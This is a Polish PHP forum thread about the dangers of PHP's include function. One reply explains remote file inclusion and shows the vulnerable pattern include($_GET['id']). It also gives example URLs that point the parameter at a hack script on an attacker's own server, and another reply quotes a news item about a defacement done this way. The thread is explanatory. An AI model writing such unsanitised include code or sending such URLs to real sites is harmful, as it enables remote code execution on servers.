Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> include
kubatron
post
Post #1





Grupa: Zarejestrowani
Postów: 581
Pomógł: 0
Dołączył: 21.07.2003
Skąd: Jasło

Ostrzeżenie: (0%)
-----

czy ktoś wie jaka jest dziura w funkcji include ostatnio czytałem ze hakerzy dzieki odkrytej dziurze w funkcji include hakuja bez problemu stronki :?: :?: :?:
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi (1 - 4)
Wankster
post
Post #2





Grupa: Zarejestrowani
Postów: 208
Pomógł: 0
Dołączył: 19.04.2003

Ostrzeżenie: (0%)
-----

php Pro?
Gdzie to wyczytałeś biggrin.gif :?: rolleyes.gif
Go to the top of the page
+Quote Post
Seth
post
Post #3





Grupa: Przyjaciele php.pl
Postów: 2 335
Pomógł: 6
Dołączył: 7.03.2002

Ostrzeżenie: (0%)
-----

php Pro => php

Bledu w includzie nie ma. Jedyny blad jaki mozna wykorzystac to glupota lub niewiedza ludzi piszacych skrypt.
Przykladowo:
link do strony z artykulami wyglada tak www.example.pl/index.php?id=artykuly.php
A w glownym pliku mamy np tak:
[php:1:388bfe2a22]include( $_GET['id'] );[/php:1:388bfe2a22]
lub:
www.example.pl/index.php?id=artykuly
[php:1:388bfe2a22]include( $_GET['id'].".php" );[/php:1:388bfe2a22]

Teraz wystarczy dac np:
www.example.pl/index.php?id=http://www.naszserver.pl/hack.php
czy
www.example.pl/index.php?id=http://www.naszserver.pl/hack


P.S. kubatron: przeczytaj uwaznie regulamin i podpisy pod forami.
Go to the top of the page
+Quote Post
kubatron
post
Post #4





Grupa: Zarejestrowani
Postów: 581
Pomógł: 0
Dołączył: 21.07.2003
Skąd: Jasło

Ostrzeżenie: (0%)
-----

hacking.pl na tej stronie pisało to o schakowanej stronie dzięki dziurze w include funkcji nieklamie czytałem to i się zdiwiłem bo sie ucze teraz php
Go to the top of the page
+Quote Post
zalew
post
Post #5





Grupa: Zarejestrowani
Postów: 407
Pomógł: 0
Dołączył: 24.10.2002
Skąd: warszawa

Ostrzeżenie: (0%)
-----

wklejenie linku i cytatu przewyzsza twoje sily questionmark.gif?

edit:
searchem znalalzlem
http://www.hacking.pl/news.php?id=2567
Cytat
Grupa mY tEaM po raz kolejny wykorzystując dziurę w skryptach php podmieniła firmowy serwis internetowy. Jak mówią autorzy ataku: "Po raz kolejny okazuje się ze nieumiejętne używanie funkcji include w php może być niebezpieczne dla całego serwera".


czytaj uwaznie


--------------------
Zalew :: http://jakubzalewski.info
Go to the top of the page
+Quote Post
« Następny starszy · PHP · Następny nowszy »
 

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 22.08.2025 - 11:26
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn